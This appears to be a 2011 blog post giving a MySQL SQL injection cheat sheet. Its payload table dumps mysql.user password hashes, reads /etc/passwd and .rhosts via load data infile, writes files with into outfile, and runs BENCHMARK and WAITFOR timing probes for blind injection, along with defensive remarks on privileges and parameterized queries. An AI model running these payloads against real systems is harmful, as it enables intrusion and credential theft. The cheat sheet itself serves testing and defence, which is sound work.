Payload | Description (if any) |
select @@version; | View database version. |
select host,user,db from mysql.db; | Misc. information disclosure: lists the host, user and database of each database-level privilege grant. |
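select host,user,password from mysql.user; | View MySQL usernames and passwords (the password column holds hashes, not cleartext). This only works if the account the application connects with can read the mysql schema, which an application account should not be able to do. |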
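create table myfile (input TEXT); load data infile ‘/etc/passwd’ into table myfile; OR load data infile ‘/home/{user}/.rhosts’ into table myfile; select * from myfile; | Reading files on the filesystem. Requires the FILE privilege and is subject to the server's secure_file_priv setting, so withholding FILE from application accounts blocks it. |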
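select host,user,password from user into outfile ‘/tmp/passwd’; | Write files on the filesystem. This attack is limited by the fact that you can only write to either “/tmp” or “/var/tmp”. Whether and where it works is governed by the FILE privilege, the server's secure_file_priv setting and the OS permissions of the MySQL server account; withholding FILE from application accounts and restricting secure_file_priv blocks it. |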
select CONCAT(”a”,”b”); | Concat strings for blind SQL Injection tests. |
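BENCHMARK(1000000000,MD5(’gainingtime’)) | Cause delay for blind SQL Injection tests. A BENCHMARK() call with a very large iteration count in request parameters or in the slow-query log is a useful detection signal. |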
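BENCHMARK(1000000000,MD5(CHAR(116))) | Cause delay for blind SQL Injection tests. Same as before, but this can be used if quotes are filtered. This is why filtering quote characters is not an adequate defence on its own; parameterized queries are. |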
IF EXISTS (SELECT * FROM users WHERE username = ‘root’) BENCHMARK(1000000000,MD5(’gainingtime’)) | Check if username exists; if yes, there will be a delay. |
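IF EXISTS (SELECT * FROM users WHERE username = ‘root’) WAITFOR DELAY ‘0:0:3′ | Check if username exists; if yes, there will be a delay of 3 seconds. Note that WAITFOR DELAY is Microsoft SQL Server (T-SQL) syntax, not MySQL, so this row does not belong under the MySQL heading. |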
Sunday, January 16, 2011
SQL Injection Cheat Sheet
*MySQL